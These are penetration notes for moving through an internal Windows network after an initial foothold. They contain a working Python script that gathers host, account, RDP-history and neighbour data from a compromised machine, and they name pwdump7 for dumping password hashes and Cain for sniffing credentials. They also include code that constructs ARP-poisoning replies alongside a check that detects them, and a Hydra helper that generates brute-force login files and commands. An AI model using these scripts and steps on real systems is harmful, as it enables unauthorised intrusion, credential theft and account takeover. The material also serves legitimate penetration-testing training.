1. Information gathering (prerequisite: a foothold on one internal host has already been obtained)
2. Traffic monitoring
3. ARP spoofing
4. Password cracking
Information gathering
Internal host collection (the compromised host itself)
  IP configuration: ipconfig /all
  Processes: tasklist
  Services: services.msc
  Ports: netstat -an
  Installed software: check the default installation directories (Program Files)
  File-sharing cache information
  Remote Desktop logon cache: mstsc (saved connection history)
  FTP logon cache
  Cookies: browser cookie cache
  Software download directory
  Administrator information: net user administrator
  User information
  SAM password hashes: pwdump7 or getpass.exe
  Account information
  Boot (autostart) information
  Protected information
  Deleted data
  Log information
  Logged-on users: query user
  Note: each of these commands leaves a process-creation record on the host (Windows event 4688, Sysmon event 1) when command-line auditing is enabled.
Network collection:
  arp -a
  net view
  port scan
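The host and network collection steps above as one script. This is an added example for these notes, not code from the original page: it runs the listed commands (ipconfig /all, tasklist, netstat -an, net user administrator, query user, arp -a, net view) and parses the two outputs that decide the next hop, listening ports and ARP neighbours. The netstat and arp sample outputs are constructed so the parsers can be checked offline; the `sc query` and registry substitutes for the GUI tools services.msc and mstsc are this example's choice.

```python
"""Host and network collection from a compromised Windows foothold.

Added example for the collection checklist; not code from the original notes.
"""
import platform
import subprocess

# Commands from the checklist. services.msc and mstsc are GUI tools, so their
# command-line equivalents (sc query, the Terminal Server Client registry key
# that stores RDP connection history) stand in for them here (assumption).
HOST_COMMANDS = {
    "ipconfig": ["ipconfig", "/all"],
    "tasklist": ["tasklist"],
    "services": ["sc", "query", "state=", "all"],
    "netstat": ["netstat", "-an"],
    "administrator": ["net", "user", "administrator"],
    "logged_on": ["query", "user"],
    "rdp_history": ["reg", "query",
                    r"HKCU\Software\Microsoft\Terminal Server Client\Servers"],
    "arp": ["arp", "-a"],
    "net_view": ["net", "view"],
}

# Constructed sample of `netstat -an` on a Windows host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.0.0.5:3389          0.0.0.0:0              LISTENING
  TCP    10.0.0.5:49672         10.0.0.9:445           ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
"""

# Constructed sample of `arp -a`.
SAMPLE_ARP = """\
Interface: 10.0.0.5 --- 0xb
  Internet Address      Physical Address      Type
  10.0.0.1              00-50-56-c0-00-08     dynamic
  10.0.0.9              00-0c-29-3a-1f-2b     dynamic
  10.0.0.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""


def listening_ports(netstat_text):
    """Sorted (proto, local_ip, port) for TCP LISTENING sockets and all UDP sockets."""
    found = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        state = parts[3] if len(parts) > 3 else ""
        if proto == "TCP" and state != "LISTENING":
            continue
        ip, _, port = local.rpartition(":")  # rpartition keeps [::] intact
        found.add((proto, ip, int(port)))
    return sorted(found, key=lambda t: (t[0], t[2], t[1]))


def established_peers(netstat_text):
    """Remote IPs with an ESTABLISHED TCP session: hosts this box already talks to."""
    peers = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0] == "TCP" and parts[3] == "ESTABLISHED":
            peers.add(parts[2].rpartition(":")[0])
    return peers


def arp_neighbours(arp_text):
    """{ip: mac} for dynamic ARP entries; static broadcast/multicast rows are skipped."""
    return {p[0]: p[1] for p in (ln.split() for ln in arp_text.splitlines())
            if len(p) == 3 and p[2] == "dynamic"}


def collect():
    """Run every command in HOST_COMMANDS and return {name: output}. Windows only."""
    if platform.system() != "Windows":
        raise RuntimeError("the collection commands exist on Windows only")
    results = {}
    for name, argv in HOST_COMMANDS.items():
        try:
            proc = subprocess.run(argv, capture_output=True, text=True, timeout=60)
            results[name] = proc.stdout + proc.stderr
        except (OSError, subprocess.TimeoutExpired) as exc:
            results[name] = "error: %s" % exc
    return results


if __name__ == "__main__":
    data = collect()
    with open("collect.txt", "w", encoding="utf-8") as fh:
        for name, text in data.items():
            fh.write("===== %s =====\n%s\n" % (name, text))
    print("listening:", listening_ports(data["netstat"]))
    print("peers:", established_peers(data["netstat"]))
    print("arp:", arp_neighbours(data["arp"]))
```

The ESTABLISHED peers and dynamic ARP entries are the hosts worth trying first: the box already has a trust relationship or at least a route to them, which is more reliable than a blind port scan and quieter on the network.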
Traffic monitoring
  Wireshark
  Cain & Abel (its ARP poison routing module does the man-in-the-middle and sniffs credentials from the redirected traffic)
  ARP spoofing: poison the victim's and the gateway's ARP caches so their traffic passes through the attacker. It is noisy on a switched network: Dynamic ARP Inspection blocks it and Wireshark flags the duplicate IP-to-MAC claims.
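What ARP spoofing looks like on the wire, and the duplicate-IP check that exposes it. This is an added example for the traffic-monitoring and ARP-spoofing items above, not code from the original notes or from Cain or Wireshark. The records are constructed ARP replies reduced to the three fields the attack depends on (sender IP, sender MAC, target IP); the addresses and MACs are invented, and the example does not send packets, it only shows which replies a spoofer has to keep sending and how a capture reveals them.

```python
"""ARP spoofing on the wire, and the duplicate-IP check that exposes it.

Added example; not code from the original notes.
"""
from collections import defaultdict

# Constructed addresses for the example.
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00-50-56-c0-00-08"
VICTIM_IP, VICTIM_MAC = "10.0.0.5", "00-0c-29-aa-bb-05"
ATTACKER_MAC = "00-0c-29-de-ad-01"


def poison_replies(attacker_mac, victim_ip, gateway_ip):
    """The two unsolicited replies a spoofer keeps repeating to sit in the middle.

    Returned as (sender_ip, sender_mac, target_ip); actually sending them needs
    raw sockets (Cain's ARP poison routing or a packet library), not done here.
    """
    return [
        (gateway_ip, attacker_mac, victim_ip),   # "I am the gateway" -> victim
        (victim_ip, attacker_mac, gateway_ip),   # "I am the victim"  -> gateway
    ]


# Constructed capture: legitimate replies first, then the poisoning starts.
CAPTURE = [
    (VICTIM_IP, VICTIM_MAC, GATEWAY_IP),
    (GATEWAY_IP, GATEWAY_MAC, VICTIM_IP),
    ("10.0.0.9", "00-0c-29-3a-1f-2b", VICTIM_IP),
] + poison_replies(ATTACKER_MAC, VICTIM_IP, GATEWAY_IP) * 2


def ip_mac_conflicts(replies):
    """{ip: [macs]} for every sender IP claimed by more than one MAC.

    This is the bookkeeping behind Wireshark's 'duplicate IP address detected'
    expert info: the same IP answering with two different hardware addresses.
    """
    claims = defaultdict(list)
    for sender_ip, sender_mac, _ in replies:
        if sender_mac not in claims[sender_ip]:
            claims[sender_ip].append(sender_mac)
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


def likely_spoofers(conflicts):
    """A MAC that claims two or more conflicting IPs is the poisoning host."""
    count = defaultdict(int)
    for macs in conflicts.values():
        for mac in macs:
            count[mac] += 1
    return {mac for mac, n in count.items() if n > 1}


if __name__ == "__main__":
    conflicts = ip_mac_conflicts(CAPTURE)
    for ip, macs in conflicts.items():
        print("%s claimed by %s" % (ip, ", ".join(macs)))
    print("likely spoofer:", likely_spoofers(conflicts))
```

The detection side is the caveat for the attacker: the spoofer must keep re-sending both replies (caches expire), so a monitor that records IP-to-MAC claims sees the conflict within seconds, and the single MAC present in both conflicts is the attacker's.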
Password cracking (the options below are those of THC Hydra)
  -R    restore a previous aborted/crashed session
  -S    connect over SSL
  -s    specify the port (when the service is not on its default port)
  -l    specify a single user name
  -L    specify a user-name dictionary (file)
  -p    specify a single password
  -P    specify a password dictionary (file)
  -e nsr  extra checks: n = empty password, s = password same as the login, r = login reversed
  -C    file of login:password pairs, one per line, used instead of -l/-L and -p/-P
  -o    write found logins/passwords to a file
  -t    number of parallel tasks (default 16)
  -vV   verbose: show every login/password attempt
  server   target IP
  service  service name: telnet, ftp, pop3, mssql, mysql, ssh
  Caveat: check the target's lockout policy before running a dictionary, keep -t low (hydra itself recommends -t 4 for ssh), and remember that every failed attempt is logged on the target.
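A helper for the hydra options listed above, as an added example that is neither code from the original notes nor part of the hydra project. It reproduces the -e n/s/r rule so the candidate list can be inspected or written out as a -C login:password file before hydra runs, and assembles the argument list in the `hydra [options] server service` form the notes use. It assumes a hydra binary on PATH; the user and password lists, target and file names are constructed for the example.

```python
"""Helper for the hydra options above.

Added example; not code from the original notes or from hydra itself.
"""
import shlex


def extra_candidates(login, e_flags):
    """Passwords that -e adds for one login: n = empty, s = same as login, r = reversed."""
    bad = set(e_flags) - set("nsr")
    if bad:
        raise ValueError("-e accepts only n, s, r; got %s" % sorted(bad))
    extra = []
    if "n" in e_flags:
        extra.append("")
    if "s" in e_flags:
        extra.append(login)
    if "r" in e_flags:
        extra.append(login[::-1])
    return extra


def colon_pairs(logins, passwords, e_flags=""):
    """login:password lines for a -C file.

    The -e candidates come first for each login (this helper's ordering, not
    a statement about hydra's internal order); duplicates such as admin:admin
    coming from both -e s and the password list are dropped.
    """
    pairs, seen = [], set()
    for login in logins:
        for pw in extra_candidates(login, e_flags) + list(passwords):
            if (login, pw) not in seen:
                seen.add((login, pw))
                pairs.append("%s:%s" % (login, pw))
    return pairs


def hydra_argv(server, service, *, login=None, login_file=None, password=None,
               password_file=None, colon_file=None, e_flags="", port=None,
               ssl=False, output=None, tasks=16, verbose=True, restore=False):
    """Build the hydra command line.

    -C replaces -l/-L and -p/-P, so mixing them is rejected here rather than
    leaving it to hydra to complain.
    """
    if colon_file and (login or login_file or password or password_file):
        raise ValueError("-C replaces -l/-L and -p/-P; do not combine them")
    argv = ["hydra"]
    if restore:
        argv.append("-R")
    if ssl:
        argv.append("-S")
    if port:
        argv += ["-s", str(port)]
    if login:
        argv += ["-l", login]
    if login_file:
        argv += ["-L", login_file]
    if password:
        argv += ["-p", password]
    if password_file:
        argv += ["-P", password_file]
    if colon_file:
        argv += ["-C", colon_file]
    if e_flags:
        argv += ["-e", e_flags]
    if output:
        argv += ["-o", output]
    argv += ["-t", str(tasks)]
    if verbose:
        argv.append("-vV")
    return argv + [server, service]


if __name__ == "__main__":
    # Constructed lists; write the -C file and print the commands instead of running them.
    users, passwords = ["root", "admin"], ["123456", "admin", "P@ssw0rd"]
    with open("combos.txt", "w") as fh:
        fh.write("\n".join(colon_pairs(users, passwords, "nsr")) + "\n")
    print(shlex.join(hydra_argv("10.0.0.9", "ssh", colon_file="combos.txt",
                                tasks=4, output="found.txt")))
    print(shlex.join(hydra_argv("10.0.0.9", "ssh", login_file="users.txt",
                                password_file="pass.txt", e_flags="nsr", tasks=4)))
```

Generating the -C file yourself is the way to control attempt order and size: the most likely pairs (empty, login-as-password, reversed login) go first, duplicates disappear, and the total number of attempts against a service with a lockout policy is known before the first connection is made.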